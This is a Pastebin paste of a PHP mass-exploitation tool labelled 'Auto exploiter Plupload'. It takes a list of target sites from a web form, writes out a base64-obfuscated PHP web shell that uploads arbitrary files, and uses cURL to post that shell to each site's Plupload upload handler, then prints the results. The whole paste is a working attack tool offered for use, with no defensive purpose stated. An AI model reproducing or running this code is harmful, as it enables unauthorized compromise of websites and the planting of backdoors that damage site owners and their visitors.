ustadcage_48

Auto exploiter Plupload

Apr 24th, 2016
337
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 2.51 KB | None | 0 0
  1. <link href='http://fonts.googleapis.com/css?family=Love+Ya+Like+A+Sister' rel='stylesheet' type='text/css'>
  2. <link href='http://fonts.googleapis.com/css?family=Kaushan+Script' rel='stylesheet' type='text/css'>
  3.  
  4.  
  5.  <style type="text/css">
  6. body {text-align:center;}
  7. a {color:darkgreen; font-family: 'Kaushan Script', sans-serif; }
  8. .anu { text-size:40px;font-family: 'Love Ya Like A Sister', sans-serif; }
  9. .lol {font-family: 'Kaushan Script', sans-serif; }
  10. .entryfield {width:600px;height:200px;border:1px solid green; font-family: 'Kaushan Script', sans-serif; }
  11. .subbtn {background:green;color:white;border: 1px solid darkgreen; padding:6px 6px 6px 6px; font-family: 'Kaushan Script', sans-serif; }
  12. .subbtn:hover {background:#c0bfbf;color:#000000; font-family: 'Kaushan Script', sans-serif; }
  13. </style>
  14.  
  15. <br>
  16. <br>
  17. <div class="anu"><font size="40">AUTO PLUPLOAD INDOXPLOIT</font></div>
  18.  <form method="post" action="" enctype="multipart/form-data">
  19. <textarea class="entryfield" name="sites"></textarea><br><br>
  20. <input class="subbtn" type="submit" name="go" value="Klik Senpaiii !!">
  21. </form>
  22.  
  23.  
  24.  
  25.  
  26.  
  27. <?php
  28.  
  29. /* ustadcage_48 */
  30. /* cURL Scripter */
  31.  
  32. $site = explode("\r\n", $_POST['sites']);
  33. $go = $_POST['go'];
  34. if($go) {
  35. foreach($site as $sites) {
  36.  
  37.     $nama_doang = "a.php";
  38.     $isi_nama_doang = "PD9waHAgCmlmKCRfUE9TVCl7CmlmKEBjb3B5KCRfRklMRVNbImYiXVsidG1wX25hbWUiXSwkX0ZJTEVTWyJmIl1bIm5hbWUiXSkpewplY2hvIjxiPmJlcmhhc2lsPC9iPi0tPiIuJF9GSUxFU1siZiJdWyJuYW1lIl07Cn1lbHNlewplY2hvIjxiPmdhZ2FsIjsKfQp9CmVsc2V7CgllY2hvICI8Zm9ybSBtZXRob2Q9cG9zdCBlbmN0eXBlPW11bHRpcGFydC9mb3JtLWRhdGE+PGlucHV0IHR5cGU9ZmlsZSBuYW1lPWY+PGlucHV0IG5hbWU9diB0eXBlPXN1Ym1pdCBpZD12IHZhbHVlPXVwPjxicj4iOwp9Cgo/Pg==";
  39.     $decode_isi = base64_decode($isi_nama_doang);
  40.     $encode = base64_encode($nama_doang);
  41.     $fp = fopen($nama_doang,"w");
  42.     fputs($fp, $decode_isi);
  43.  
  44. $url = "{$sites}"; // put URL Here
  45. $post = array
  46. (
  47. "file" => "@{$nama_doang}",
  48. "name" => " a.php"
  49. );
  50. $ch = curl_init ("$url");
  51. curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
  52. curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
  53. curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  54. curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);
  55. curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
  56. curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
  57. curl_setopt ($ch, CURLOPT_POST, 1);
  58. @curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
  59. $data = curl_exec ($ch);
  60. curl_close ($ch);
  61.  
  62. echo "<div class='lol'><a href=$sites>$sites</a><br>Result<br>";
  63. echo $data;
  64. echo "</div><br>";
  65.  
  66. }
  67. }
  68.  
  69. ?>
Add Comment
Please, Sign In to add comment